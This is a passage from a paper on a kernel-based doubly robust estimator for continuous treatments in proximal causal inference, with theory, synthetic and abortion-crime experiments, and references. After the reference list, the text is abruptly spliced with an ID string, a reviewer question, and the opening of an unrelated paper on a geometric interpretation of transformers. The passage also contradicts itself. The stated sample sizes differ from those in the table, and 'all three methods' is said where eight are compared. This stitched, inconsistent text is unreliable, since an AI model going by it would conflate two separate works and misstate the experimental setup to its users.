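To see why the kernel smoothing in Eqs. 6 and 7 is consistent, and where the $O(h_{bw}^2)$ bias in Remark 4.4 (and later Thm. 6.4) comes from, the following is a sketch of the standard smoothing-bias calculation; it assumes, beyond Assump. 4.1, that the map $g(t) := \mathbb{E}[q_0(a, Z, X)Y \mid A = t]\, p_A(t)$ is twice continuously differentiable, and it is not a substitute for the formal proofs in the appendix. Writing the expectation as an integral over $t$ and substituting $u = (t - a)/h_{bw}$,
$$\mathbb{E}\big[K_{h_{bw}}(A - a)\, q_0(a, Z, X)\, Y\big] = \int K_{h_{bw}}(t - a)\, g(t)\, dt = \int K(u)\, g(a + h_{bw} u)\, du.$$
A second-order Taylor expansion of $g$ around $a$, together with $\int K(u)\, du = 1$ and $\int u K(u)\, du = 0$ from Assump. 4.1, gives
$$\int K(u)\, g(a + h_{bw} u)\, du = g(a) + \frac{h_{bw}^2}{2} \kappa_2(K)\, g''(a) + o(h_{bw}^2),$$
where $g(a)$ coincides with the target $\beta(a)$ of Thm. 4.2 under the delta-function convention used there. Hence the smoothing bias vanishes at rate $O(h_{bw}^2)$, matching the leading bias term of Thm. 6.4.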
In the subsequent section, we show that the estimator in Eq. 7 can also be derived from a smooth approximation of the influence function of $\beta(a)$.

4.2 INFLUENCE FUNCTION UNDER CONTINUOUS TREATMENTS

In this section, we employ the method of Gateaux derivatives (Carone et al., 2018; Ichimura & Newey, 2022) to derive the influence function of $\beta(a)$. (For our non-regular parameter, we borrow the terminology "influence function" from the estimation of regular parameters; see, e.g., Ichimura & Newey (2022).) Specifically, we denote by $P_X$ the distribution function of any variable $X$, and rewrite $\beta(a)$ as $\beta(a; P_O^0)$, where $P_O^0$ denotes the true distribution of $O := (A, Z, W, X, Y)$. Besides, we consider the submodel $P_O^{\varepsilon} = (1 - \varepsilon)P_O^0 + \varepsilon P_O^{h_{bw}}(o)$, where $P_O^{h_{bw}}(\cdot)$ maps a point $o$ to a distribution of $O$; i.e., $P_O^{h_{bw}}(o)$, for a fixed $o$, denotes a distribution of $O$ that approximates a point mass at $o$. Different types of $P_O^{h_{bw}}(o)$ lead to different forms of the Gateaux derivative. In our paper, we choose the distribution $P_O^{h_{bw}}(o)$ whose probability density function (pdf) is $p_O^{h_{bw}}(o) = K_{h_{bw}}(O - o)\mathbb{I}(p_O^0(o) > h_{bw})$, which satisfies $\lim_{h_{bw} \to 0} p_O^{h_{bw}}(o) = \lim_{h_{bw} \to 0} K_{h_{bw}}(O - o)$. We can then calculate the limit of the Gateaux derivative (Ichimura & Newey, 2022) of the functional $\beta(a; P_O^{\varepsilon})$ with respect to the deviation $P_O^{h_{bw}}(o) - P_O^0$. The following theorem shows that our kernel-based doubly robust estimator corresponds to the influence function:

Theorem 4.5. Under a nonparametric model, the limit of the Gateaux derivative is
$$\lim_{h_{bw} \to 0} \frac{\partial}{\partial \varepsilon} \beta(a; P_O^{\varepsilon}) \bigg|_{\varepsilon = 0} = (Y - h_0(a, W, X))\, q_0(a, Z, X) \lim_{h_{bw} \to 0} K_{h_{bw}}(A - a) + h_0(a, W, X) - \beta(a).$$

Remark 4.6. For binary treatments, the DR estimator with the indicator function in Eq. 4 corresponds to the efficient influence function, as derived within the non-parametric framework (Cui et al., 2023). Different from previous works (Colangelo & Lee, 2020), deriving the influence function within the proximal causal framework is much more challenging, as it involves the Gateaux derivatives of the nuisance functions $h_0, q_0$, which have implicit functional forms. Employing our estimator, we can effectively obtain causal effects even when the unconfoundedness assumption of Colangelo & Lee (2020) is not satisfied.

5 NUISANCE FUNCTION ESTIMATION

In this section, we propose to solve for $h_0, q_0$ from the integral equations Eqs. 2 and 3 for continuous treatments. We first introduce the estimation of $q_0$. Previous methods (Kallus et al., 2021; Ghassami et al., 2022) solved for $q_0(a, Z, X)$ by running an optimization algorithm for each $a = 0, 1$. However, this is computationally infeasible for continuous treatments; please see Appx. D.2 for a detailed comparison.

Instead of running an optimization for each $a$, we would like to estimate $q_0(A, Z, X)$ with a single optimization. To achieve this goal, we propose a two-stage estimation algorithm: we first estimate the policy function $p(A \mid w, x)$ and plug it into Eq. 3. To efficiently solve for $q_0$, we note that solving Eq. 3 is equivalent to minimizing the residual mean squared error $L_q(q; p) := \mathbb{E}[(R_q(q; p))^2]$.
According to the lemma shown below, this mean squared error can be reformulated as a maximization, thereby converting the estimation into a min-max optimization problem.

Lemma 5.1. Denote $\|f(X)\|_{L_2}^2 := \mathbb{E}[f^2(X)]$. For any parameter $\lambda_m > 0$, we have
$$L_q(q; p) = \sup_{m \in M} \mathbb{E}\big[m(A, W, X)\big(q(A, Z, X) - 1/p(A \mid W, X)\big)\big] - \lambda_m \|m(A, W, X)\|_{L_2}^2,$$
where $M$ is the space of continuous functions over $(A, W, X)$. The proof is left to Appx. D.

Motivated by Lemma 5.1, we can solve for $q_0$ via the following min-max optimization:
$$\min_{q \in Q} \max_{m \in M} \Phi_{q, \lambda_m}(q, m; p) := \frac{1}{n} \sum_{i} \left( q(a_i, z_i, x_i) - \frac{1}{p(a_i \mid w_i, x_i)} \right) m(a_i, w_i, x_i) - \lambda_m \|m\|_{2,n}^2, \tag{8}$$
where $\lambda_m \|m\|_{2,n}^2$ is called the stabilizer, with $\|m\|_{2,n}^2 := \frac{1}{n} \sum_i m^2(a_i, w_i, x_i)$. To solve the min-max problem, we can parameterize $q$ and $m$ in reproducing kernel Hilbert spaces (RKHSs); we derive their closed-form solutions in Appx. E. Alternatively, we can use Generative Adversarial Networks (Goodfellow et al., 2014) to solve this problem.
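For intuition on why minimizing the empirical objective in Eq. 8 recovers $q_0$, we sketch the inner maximization of Lemma 5.1; this is a heuristic calculation, not a substitute for the proof in Appx. D. Writing $\text{proj}_q(\cdot) := \mathbb{E}[\cdot \mid A, W, X]$ (this projection reappears in Sec. 6), Eq. 3 gives $\mathbb{E}[q_0(A, Z, X) \mid A, W, X] = 1/p(A \mid W, X)$, so the residual $R := \mathbb{E}[q(A, Z, X) - 1/p(A \mid W, X) \mid A, W, X]$ equals $\text{proj}_q(q - q_0)$. By the tower property, for any $m \in M$,
$$\mathbb{E}\big[m(A, W, X)\big(q(A, Z, X) - 1/p(A \mid W, X)\big)\big] - \lambda_m \|m\|_{L_2}^2 = \mathbb{E}[mR] - \lambda_m \mathbb{E}[m^2],$$
which is maximized pointwise at the critic $m^* = \frac{1}{2\lambda_m} R = \frac{1}{2\lambda_m}\text{proj}_q(q - q_0)$, with value $\frac{1}{4\lambda_m}\mathbb{E}[R^2] = \frac{1}{4\lambda_m}L_q(q; p)$. Hence the supremum agrees with $L_q(q; p)$ up to the positive factor $1/(4\lambda_m)$ (exact equality for $\lambda_m = 1/4$), so minimizing the empirical sup in Eq. 8 targets the same minimizer $q_0$, at which $L_q$ vanishes by Eq. 3. Note also that the optimal critic $m^*$ is precisely the function that the closedness condition in Assump. 6.1(5) below requires the class $M$ to contain.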
Estimating the policy function $p(A = a \mid w, x)$. To optimize Eq. 8, we must first estimate $p(a \mid w, x)$. Several methods can be used for this estimation, such as kernel density estimation and normalizing flows (Chen, 2017; Bishop, 1994; Ambrogioni et al., 2017; Sohn et al., 2015; Rezende & Mohamed, 2015; Dinh et al., 2016). In this paper, we employ kernel density estimation (Chen, 2017), which has been shown to be effective in low-dimensional scenarios. When the dimension of $(W, X)$ is high, we employ conditional normalizing flows (CNFs), which have been shown to be universal density approximators (Durkan et al., 2019) and can thus be applied to complex scenarios.

Nuisance function $h_0$. Since the estimation of $h_0$ does not involve indicator functions, we can apply many off-the-shelf optimization approaches derived from conditional moment equations, such as two-stage penalized regression (Singh, 2020; Mastouri et al., 2021; Xu et al., 2021), maximum moment restriction (Zhang et al., 2020; Muandet et al., 2020a), and minimax optimization (Dikkala et al., 2020; Muandet et al., 2020b). To align with the estimation of $q_0$, we choose to estimate $h_0$ via the following min-max optimization problem, derived in Kallus et al. (2021):
$$\min_{h \in H} \max_{g \in G} \Phi_h^{n,\lambda_g}(h, g) := \frac{1}{n} \sum_i g(a_i, z_i, x_i)(y_i - h(a_i, w_i, x_i)) - \lambda_g \|g\|_{2,n}^2, \tag{9}$$
where $H$ and $G$ respectively denote the bridge functional class and the critic functional class.

6 THEORETICAL RESULTS

In this section, we provide a convergence analysis of Eqs. 8 and 9 for the nuisance functions $h_0, q_0$, as well as for the causal effect $\beta(a)$ with the PKDR estimator in Eq. 7. We first provide a convergence analysis for $q_0$; the result for $h_0$ is similar and left to Appx. E. Different from previous works (Dikkala et al., 2020; Ghassami et al., 2022), our analysis faces a significant challenge arising from the estimation error inherent in the propensity score function; by addressing this challenge, our result explicitly accounts for this error. Formally, we consider the projected residual mean squared error (RMSE) $\mathbb{E}[\text{proj}_q(\hat{q} - q_0)^2]$, where $\text{proj}_q(\cdot) := \mathbb{E}[\cdot \mid A, W, X]$.

Before presenting our results, we introduce an assumption on the critic functional class $M$, similarly made in Dikkala et al. (2020); Ghassami et al. (2022); Qi et al. (2023).

Assumption 6.1. (1) (Boundedness) $\|Q\|_\infty < \infty$ and $\hat{p}$ is uniformly bounded; (2) (Symmetry) $M$ is a symmetric class, i.e., if $m \in M$, then $-m \in M$; (3) (Star-shapedness) $M$ is a star-shaped class, i.e., for each function $m$ in the class and any $\alpha \in [0, 1]$, $\alpha m$ also belongs to the class; (4) (Realizability) $q_0 \in Q$; (5) (Closedness) $\frac{1}{2\lambda_m} \text{proj}_q(q - q_0) \in M$.

Under Assump. 6.1, we have the following convergence result in terms of $\|\text{proj}_q(\hat{q} - q_0)\|_{L_2}$.

Theorem 6.2. Let $\delta_n^q$ be an upper bound on the Rademacher complexity of $M$. For any $\eta \in (0, 1)$, define $\bar{\delta}_n^q := \delta_n^q + c_0^q \sqrt{\log(c_1^q/\eta)/n}$ for some constants $c_0^q, c_1^q$; then, under Assump. 6.1, with probability $1 - \eta$,
$$\|\text{proj}_q(\hat{q} - q_0)\|_2 = O\left(\bar{\delta}_n^q \sqrt{\lambda_m^2 + \lambda_m + 1} + \left\|\frac{1}{p} - \frac{1}{\hat{p}}\right\|_2\right),$$
where $p$ stands for $p(a \mid w, x)$.

Remark 6.3. Inspired by Chen & Pouzo (2012); Dikkala et al. (2020); Kallus et al. (2021), we can obtain the same upper bound for the RMSE $\|\hat{q} - q_0\|_2$, up to a measure of ill-posedness $\tau_q := \sup_{q \in Q} \|q - q_0\|_2 / \|\text{proj}_q(q - q_0)\|_2 < \infty$. The bound above comprises two components: the first pertains to the estimation of $q$, while the second concerns the estimation of $1/p$. The first part is mainly governed by the Rademacher complexity $\bar{\delta}_n^q$, which can attain $O(n^{-1/4})$ if we parameterize $M$ as a class with bounded metric entropy, such as Hölder balls, Sobolev balls, and RKHSs. For the second part, we can also achieve $O(n^{-1/4})$ for $\|1/p - 1/\hat{p}\|_2$ under some conditions (Chernozhukov et al., 2022; Klosin, 2021; Colangelo & Lee, 2020).

We are now ready to present the convergence result for $\beta(a)$ within the proximal causal framework.

Theorem 6.4. Under Assumps. 3.1, 3.4, and 4.1, suppose $\|\hat{h} - h_0\|_2 = o(1)$, $\|\hat{q} - q_0\|_2 = o(1)$, $\|\hat{h} - h_0\|_2 \|\hat{q} - q_0\|_2 = o((nh_{bw})^{-1/2})$, $nh_{bw}^5 = O(1)$, and $nh_{bw} \to \infty$; that $h_0(a, w, x)$, $p(a, z \mid w, x)$, and $p(a, w \mid z, x)$ are twice continuously differentiable w.r.t. $a$; and that $h_0, q_0, \hat{h}, \hat{q}$ are uniformly bounded. Then, for any $a$, the bias and variance of the PKDR estimator in Eq. 7 satisfy
$$\text{Bias}(\hat{\beta}(a)) := \mathbb{E}[\hat{\beta}(a)] - \beta(a) = \frac{h_{bw}^2}{2} \kappa_2(K) B + o((nh_{bw})^{-1/2}), \quad \text{Var}[\hat{\beta}(a)] = \frac{\Omega_2(K)}{nh_{bw}} (V + o(1)),$$
where $B = \mathbb{E}\left[q_0(a, Z, X)\left(2 \frac{\partial}{\partial a} h_0(a, W, X) \frac{\partial}{\partial a} p(a, W \mid Z, X) + \frac{\partial^2}{\partial a^2} h_0(a, W, X)\right)\right]$ and $V = \mathbb{E}\left[q_0(a, Z, X)^2 (Y - h_0(a, W, X))^2 \mid A = a\right]$.

Remark 6.5. The smoothness condition holds for a broad family of distributions and is thus similarly made in kernel-based methods (Kallus & Zhou, 2018; Kallus & Uehara, 2020). According to Thm. 6.2, we have $\|\hat{h} - h_0\|_2 = O(n^{-1/4})$ and $\|\hat{q} - q_0\|_2 = O(n^{-1/4})$, which satisfies the required consistency condition as long as $h_{bw} = o(1)$. Besides, we show in Thm. E.9 in Appx. E.5 that this estimator is $n^{2/5}$-consistent.
From Thm. 6.4, the optimal bandwidth is $h_{bw} = O(n^{-1/5})$, under which the MSE converges at the rate $O(n^{-4/5})$. Note that this rate is slower than the optimal rate $O(n^{-1})$, which is a reasonable sacrifice for handling continuous treatments within the proximal causal framework and agrees with existing studies (Kennedy et al., 2017; Colangelo & Lee, 2020).

7 EXPERIMENTS

In this section, we evaluate the effectiveness of our method using two sets of synthetic data, one low-dimensional and one high-dimensional, as well as the legalized abortion and crime dataset (Donohue III & Levitt, 2001). In Appx. G, we conduct experiments on more benchmark datasets, including time-series forecasting.

Compared baselines. We compare our method with the following baselines, which use only $h_0$ for estimation, i.e., $\hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} h_0(a, w_i, x_i)$: i) Proximal Outcome Regression (POR), which solves Eq. 9 for estimation; ii) PMMR (Mastouri et al., 2021), which employs the Maximum Moment Restriction (MMR) framework to estimate the bridge function via kernel learning; iii) KPV (Mastouri et al., 2021), which uses two-stage kernel regression; iv) DFPV (Xu et al., 2021), which uses deep neural networks to model high-dimensional nonlinear relationships between proxies and outcomes; v) MINMAX (Dikkala et al., 2020), which uses generative adversarial networks to solve Eq. 9; and vi) NMMR (Kompa et al., 2022), which introduces data-adaptive kernel functions derived from neural networks. For our method, we implement the inverse probability weighting (IPW) estimator PKIPW, which uses $q_0$ (solved via Eq. 8) for estimation, and the doubly robust estimator PKDR, which uses both nuisance functions $h_0$ and $q_0$ to estimate causal effects through Eq. 7. For simplicity, we only present results for the PKDR variant that uses POR to estimate $h_0$.

Implementation details. In the PKIPW and PKDR estimators, we choose the second-order Epanechnikov kernel, with bandwidth $h_{bw} = c \hat{\sigma}_A n^{-1/5}$, where $\hat{\sigma}_A$ is the estimated standard deviation of $A$ and $c > 0$ is a hyper-parameter. In our paper, we vary $c$ over the range $\{0.5, 1, 1.5, \cdots, 4.0\}$ and report the optimal $c$ in terms of cMSE. To estimate the nuisance functions, we parameterize $Q$ and $M$ (resp., $H$ and $G$) via RKHSs for $q_0$ (resp., $h_0$), where we use Gaussian kernels with bandwidth parameters initialized using the median distance heuristic. For policy estimation, we employ KDE on the low-dimensional synthetic dataset and the real-world data, while opting for CNFs on the high-dimensional synthetic dataset. We leave more details about the hyper-parameters to Appx. H.

Evaluation metrics. We report the causal Mean Squared Error (cMSE) across 100 equally spaced points in the range of $\text{supp}(A)$: $\text{cMSE} := \frac{1}{100} \sum_{i=1}^{100} (\mathbb{E}[Y^{a_i}] - \hat{\mathbb{E}}[Y^{a_i}])^2$. Here, we take $\text{supp}(A) := [-1, 2]$, $[0, 1]$, and $[0, 2]$ for the low-dimensional synthetic data, the high-dimensional synthetic data, and the real-world data, respectively. The ground truth $\mathbb{E}[Y^{a_i}]$ is derived through Monte Carlo simulations comprising 10,000 replicates of the data-generating process for each $a$.
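For illustration, below is a minimal NumPy sketch of the PKIPW and PKDR estimators in Eqs. 6 and 7, using the Epanechnikov kernel and the bandwidth rule $h_{bw} = c \hat{\sigma}_A n^{-1/5}$ from the implementation details above. The fitted bridge functions are assumed to be supplied as vectorized callables; the function names are illustrative placeholders, not our exact implementation.

```python
import numpy as np

def epanechnikov(u):
    """Second-order Epanechnikov kernel: K(u) = 0.75 * (1 - u^2) on |u| <= 1."""
    return 0.75 * (1.0 - u ** 2) * (np.abs(u) <= 1.0)

def pkdr(a, A, Z, W, X, Y, q_hat, h_hat, c=1.5):
    """PKDR estimate of beta(a) (Eq. 7); dropping the h-terms yields PKIPW (Eq. 6).

    q_hat(a, Z, X) and h_hat(a, W, X) are fitted bridge functions returning one
    value per sample; the bandwidth follows h_bw = c * sigma_A * n^(-1/5).
    """
    n = len(A)
    h_bw = c * A.std() * n ** (-1.0 / 5.0)
    k = epanechnikov((A - a) / h_bw) / h_bw      # kernel weights K_h(a_i - a)
    q = q_hat(a, Z, X)                           # \hat{q}(a, z_i, x_i)
    h = h_hat(a, W, X)                           # \hat{h}(a, w_i, x_i)
    return np.mean(k * q * (Y - h) + h)
```

The cMSE reported in our tables then simply averages the squared error of such estimates over 100 equally spaced values of $a$ in $\text{supp}(A)$.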
Figure 2: ATE comparison of the different methods on the three datasets. Left: ATE comparison using 1000 samples in the first experiment; Middle: ATE comparison using 2000 samples in the second experiment; Right: ATE comparison for the abortion and crime dataset.

7.1 SYNTHETIC STUDY

We consider two distinct scenarios. The first demonstrates the effectiveness of the kernel method in the context of the doubly robust estimator under model misspecification, while the second evaluates its utility in high-dimensional settings. For both scenarios, we report the mean cMSE of each method over 20 runs.

7.1.1 DOUBLE ROBUSTNESS STUDY

Data generation. We follow the generative process in Mastouri et al. (2021) and leave the details to Appx. H. Similar to Kang & Schafer (2007) and Cui et al. (2023), we consider four scenarios where either or both confounding bridge functions are misspecified, by fitting a model to a transformation of the observed variables:

- Scenario 1. We follow Mastouri et al. (2021) to generate data;
- Scenario 2. The outcome confounding bridge function is misspecified, with $W^* = |W|^{1/2} + 1$;
- Scenario 3. The treatment confounding bridge function is misspecified, with $Z^* = |Z|^{1/2} + 1$;
- Scenario 4. Both confounding bridge functions are misspecified.

Table 1: cMSE of all methods on the two synthetic datasets and the real-world data.

| Dataset | Size | PMMR | KPV | DFPV | MINMAX | NMMR | POR | PKIPW | PKDR |
|------------------|------|--------|--------|--------|--------|--------|--------|--------|--------|
| Doubly Robust | | | | | | | | | |
| Scenario 1 | 500 | 0.16±0.05 | 0.37±0.26 | 0.30±0.13 | 0.20±0.15 | 0.29±0.11 | 0.19±0.11 | 0.11±0.06 | 0.11±0.06 |
| | 1000 | 0.14±0.03 | 0.21±0.09 | 0.26±0.06 | 0.10±0.05 | 0.25±0.09 | 0.16±0.10 | 0.11±0.08 | 0.16±0.04 |
| Scenario 2 | 500 | 3.32±0.06 | 3.50±0.16 | 1.01±0.19 | 7.48±2.05 | 4.72±1.38 | 3.47±0.08 | 0.10±0.11 | 0.16±0.11 |
| | 1000 | 3.32±0.06 | 3.49±0.19 | 1.97±0.18 | 5.27±0.96 | 5.71±1.10 | 3.48±0.07 | 0.20±0.14 | 0.24±0.19 |
| Scenario 3 | 500 | 0.15±0.05 | 0.29±0.18 | 0.28±0.13 | 0.35±0.26 | 0.38±0.15 | 0.20±0.12 | 2.39±0.60 | 0.20±0.15 |
| | 1000 | 0.14±0.03 | 0.20±0.08 | 0.30±0.10 | 0.27±0.13 | 0.47±0.37 | 0.22±0.14 | 2.15±0.90 | 0.19±0.10 |
| Scenario 4 | 500 | 3.32±0.05 | 3.51±0.21 | 1.00±0.22 | 0.69±1.03 | 5.60±1.26 | 3.46±0.08 | 2.91±0.58 | 3.38±0.53 |
| | 1000 | 3.29±0.03 | 3.46±0.14 | 1.02±0.23 | 5.10±0.90 | 5.65±1.51 | 3.44±0.07 | 1.87±0.91 | 3.56±3.07 |
| High Dimension | 500 | 0.74±0.06 | 0.34±0.06 | 0.22±0.11 | 0.12±0.07 | 0.14±0.05 | 0.31±0.07 | 0.20±0.03 | 0.08±0.04 |
| | 1000 | 0.69±0.05 | 0.36±0.02 | 0.24±0.09 | 0.07±0.03 | 0.05±0.04 | 0.30±0.08 | 0.19±0.03 | 0.09±0.04 |
| Abort. & Crime | 1500 | 0.02±0.00 | 0.03±0.01 | 0.07±0.05 | 0.05±0.00 | 0.01±0.01 | 0.01±0.00 | 0.04±0.02 | 0.02±0.00 |

Results. We present the mean and standard deviation (std) of the cMSE over 20 runs across the four scenarios, as depicted in Fig. 2 and Tab. 1. For each scenario, we consider two sample sizes, 500 and 1,000. In the first scenario, our PKDR is comparable to, and even better than, the estimators based on $h_0$. For the scenarios with misspecification, the PKIPW estimator and the baselines using only $h_0$ perform well in scenario 2 and scenario 3, respectively. Notably, PKDR performs consistently well in both of these scenarios, thanks to its double robustness against model misspecification. In scenario 4, where the models of both $h_0$ and $q_0$ are misspecified, all methods suffer from a large error.
Besides, we can see that the PKIPW method has a large variance in scenario 4, where the estimates of both the policy function and $q_0$ can be inaccurate due to misspecification (Robins et al., 2007; Jiang et al., 2022). It is worth mentioning that, compared to the others, DFPV exhibits minimal error in scenario 4. This could be attributed to their approach of fitting each variable's kernel function individually with a separate neural network, thereby enhancing the flexibility of their models.

**Sensitivity Analysis.** According to Thm. 6.4, $h_{bw}$ controls the trade-off between bias and variance. To show this, we report the cMSE as $c$ in $h_{bw} := c\hat{\sigma}_A n^{-1/5}$ varies over $\{0.5, 1.0, 1.5, ..., 4.0\}$. As $c$ increases, the cMSE first decreases, then rises, reaching its optimum at \( c = 1.5 \), which is consistent with the optimal value derived in Kallus et al. (2021).

Figure 3: Sensitivity analysis of \( c \) in \( h_{bw} = c \hat{\sigma}_A n^{-1/5} \) for the PKIPW (left) and PKDR (right) estimators.

### 7.1.2 High Dimensional Study

**Data generation.** We follow Colangelo & Lee (2020); Singh (2020) to generate data, in which we set \( \text{dim}(X) = 100 \), \( \text{dim}(Z) = 10 \), and \( \text{dim}(W) = 10 \). Specifically, we set \( X \sim N(0, \Sigma) \), where \( \Sigma \in \mathbb{R}^{100 \times 100} \) has \( \Sigma_{ii} = 1 \) for \( i \in [\text{dim}(X)] \) and \( \Sigma_{ij} = \frac{1}{2} \cdot \mathbb{1}\{|i - j| = 1\} \) for \( i \neq j \). The outcome \( Y \) is generated from \( Y = A^2 + 1.2A + 1.2(X^\top \beta_x + W^\top \beta_w) + AX_1 + 0.25U \), where \( \beta_x, \beta_w \) exhibit quadratic decay, i.e., \( [\beta_x]_j = j^{-2} \). More details can be found in Appx. H.

**Results.** We report the mean and std of cMSE over 20 runs with sample sizes set to 1,000 and 2,000, as depicted in Fig. 2 and Tab. 1. As shown, we find that the ATE curve fitted by the PKDR estimator is closest to the real curve, and its cMSE is also the lowest. This result suggests the robustness of our method to high-dimensional covariates.

### 7.2 Legalized Abortion and Crime

We obtain the data from Donohue III & Levitt (2001); Mastouri et al. (2021), which explores the relationship between legalized abortion and crime. In this study, we take the treatment to be the effective abortion rate, the outcome variable \( Y \) to be the murder rate, the treatment-inducing proxy \( Z \) to be the generosity towards families with dependent children, and the outcome-inducing proxies \( W \) to be beer consumption per capita, log-prisoner population per capita, and concealed weapons laws. We follow the protocol of Woody et al. (2020) to preprocess the data and take the remaining variables as the unobserved confounding variables \( U \). Following Mastouri et al. (2021), the ground-truth value of \( \beta(a) \) is taken from the generative model fitted to the data.

**Results.** The results are presented in Fig. 2 and Tab. 1. It is evident that all three methods effectively estimate \( \beta(a) \), which suggests the utility of our method in real-world scenarios. However, when \( a \) falls within the range of [1.5, 2], deviations become apparent in the fitted curve. We attribute these deviations to an inadequate sample size in this range, as can be seen in Fig. 2. It is worth noting that the DFPV method, which employs neural networks (NN), exhibits higher variances. This suggests potential numerical instability in certain experiments, a phenomenon in line with observations made in Kompa et al. (2022).
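For reference, the bandwidth rule $h_{bw} = c\hat{\sigma}_A n^{-1/5}$ used in the sensitivity analysis above takes only a few lines to implement. The sketch below is illustrative rather than our actual code (the function names are ours, and we assume a Gaussian kernel); it shows how the bandwidth localizes the estimator around a treatment level $a$:

```python
import numpy as np

def gaussian_kernel(u):
    # Standard Gaussian kernel used to smooth the indicator 1{A = a}.
    return np.exp(-0.5 * u ** 2) / np.sqrt(2 * np.pi)

def kernel_weights(A, a, c=1.5):
    # Bandwidth rule from the sensitivity analysis: h_bw = c * sigma_A * n^(-1/5).
    n = len(A)
    h_bw = c * A.std() * n ** (-1 / 5)
    return gaussian_kernel((A - a) / h_bw) / h_bw, h_bw

# Toy usage: weights concentrate on units whose treatment lies near a = 0.5.
rng = np.random.default_rng(0)
A = rng.normal(size=1000)
w, h = kernel_weights(A, a=0.5)
print(h, w[:3])
```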
### 8 Conclusion

In this paper, we propose a kernel-based doubly robust estimator for continuous treatments within the proximal causal framework, where we replace the conventional indicator function with a kernel function. Additionally, we propose a more efficient approach to estimating the nuisance function \( q_0 \) by estimating the policy function and incorporating it into a min-max optimization. Our analysis reveals that the MSE converges at a rate of \( O(n^{-4/5}) \) when we select the optimal bandwidth to balance bias and variance. We demonstrate the utility of our PKDR estimator on synthetic datasets as well as the legalized abortion and crime dataset.

**Limitation and future works.** Our estimator requires estimating the policy function, which may lead to large variance, especially when the policy function is misspecified. Potential solutions include variance-reduction methods such as the stabilized IPW estimator, whose estimation form and theoretical analysis will be explored in future work.

### 9 Acknowledgments

This work was supported by the National Key Research and Development Program of China (No. 2022YFC2405100); STI 2030—Major Projects (No. 2022ZD0205300); Shanghai Municipal Science and Technology Major Project (No. 2021SHZDZX0103); the State Key Program of National Natural Science Foundation of China under Grant No. 12331009. The computations in this research were performed using the CFFF platform of Fudan University.

REFERENCES

Luca Ambrogioni, Umut Güçlü, Marcel AJ van Gerven, and Eric Maris. The kernel mixture network: A nonparametric method for conditional density estimation of continuous random variables. arXiv preprint arXiv:1705.07111, 2017.

Heejung Bang and James M Robins. Doubly robust estimation in missing data and causal inference models. Biometrics, 61(4):962–973, 2005.

Christopher M Bishop. Mixture density networks. Technical report, Aston University, 1994.

Marco Carone, Alexander R Luedtke, and Mark J van der Laan. Toward computerized efficient estimation in infinite-dimensional models. Journal of the American Statistical Association, 2018.

Marine Carrasco, Jean-Pierre Florens, and Eric Renault. Linear inverse problems in structural econometrics estimation based on spectral decomposition and regularization. Handbook of econometrics, 6:5633–5751, 2007.

Xiaohong Chen and Demian Pouzo. Estimation of nonparametric conditional moment models with possibly nonsmooth generalized residuals. Econometrica, 80(1):277–321, 2012.

Yen-Chi Chen. A tutorial on kernel density estimation and recent advances. Biostatistics & Epidemiology, 1(1):161–187, 2017.

Victor Chernozhukov, Whitney K Newey, and Rahul Singh. Automatic debiased machine learning of causal and structural effects. Econometrica, 90(3):967–1027, 2022.

Kyle Colangelo and Ying-Ying Lee. Double debiased machine learning nonparametric inference with continuous treatments. arXiv preprint arXiv:2004.03036, 2020.

Yifan Cui, Hongming Pu, Xu Shi, Wang Miao, and Eric Tchetgen Tchetgen. Semiparametric proximal causal inference. Journal of the American Statistical Association, pp. 1–12, 2023.

Nishanth Dikkala, Greg Lewis, Lester Mackey, and Vasilis Syrgkanis. Minimax estimation of conditional moment models. Advances in Neural Information Processing Systems, 33:12248–12262, 2020.

Laurent Dinh, Jascha Sohl-Dickstein, and Samy Bengio. Density estimation using real nvp. arXiv preprint arXiv:1605.08803, 2016.

John J Donohue III and Steven D Levitt. The impact of legalized abortion on crime. The Quarterly Journal of Economics, 116(2):379–420, 2001.
Arnaud Doucet, Adam M Johansen, et al. A tutorial on particle filtering and smoothing: Fifteen years later. Handbook of nonlinear filtering, 12(656-704):3, 2009. Conor Durkan, Artur Bekasov, Iain Murray, and George Papamakarios. Neural spline flows. Advances in neural information processing systems, 32, 2019. Dylan J Foster and Vasilis Syrgkanis. Orthogonal statistical learning. arXiv preprint arXiv:1901.09036, 2019. AmirEmad Ghassami, Andrew Ying, Ilya Shpitser, and Eric Tchetgen Tchetgen. Minimax kernel machine learning for a class of doubly robust functionals with application to proximal causal inference. In International Conference on Artificial Intelligence and Statistics, pp. 7210–7239. PMLR, 2022.
cSSHiLnjsJ
* Figure 1 and Figure 4 suggest that word particles travel along a path determined by the residual updates, but such a description is very general. Are there more specific properties within the residual updates?
Traveling Words: A Geometric Interpretation of Transformers

Anonymous authors Paper under double-blind review

Abstract

Transformers have significantly advanced the field of natural language processing, but comprehending their internal mechanisms remains a challenge. In this paper, we introduce a novel geometric perspective that elucidates the inner mechanisms of transformer operations. Our primary contribution is illustrating how layer normalization confines the latent features of the transformer to a hyper-sphere, subsequently enabling attention to mold the semantic representation of words on this surface. This geometric viewpoint seamlessly connects established properties such as iterative refinement and contextual embeddings. We validate our insights by probing a pre-trained 124M parameter GPT-2 model. Our findings reveal clear query-key attention patterns in early layers and build upon prior observations regarding the subject-specific nature of attention heads at deeper layers. Harnessing these geometric insights, we present an intuitive understanding of transformers, depicting iterative refinement as a process that models the trajectory of word particles along the surface of a hyper-sphere.

1 Introduction

The transformer architecture (Vaswani et al., 2017) has sparked a significant shift in Artificial Intelligence (AI). It is the central component behind some of the most advanced conversational AI systems (Brown et al., 2020; Thoppilan et al., 2022; Bai et al., 2022), and has been established as state-of-the-art for Natural Language Processing (NLP), Computer Vision (CV), Robotics, and many other tasks (OpenAI, 2023; Google, 2023; Chen et al., 2023; Zong et al., 2022; Driess et al., 2023). Recent work on the interpretability of the transformer architecture has focused on analyzing weights in relation to the word embedding space used in its input and output layers (Dar et al., 2022; Elhage et al., 2021; Geva et al., 2022; Brody et al., 2023; Windsor, 2022; Millidge & Black, 2022).

Figure 1: Overview of the proposed geometric interpretation of Transformers. The input token "Traveling" is embedded as a word particle onto a hyper-sphere, and residual updates determine the path that the particle will follow along the surface, culminating in the region closest to the next token: "Words".

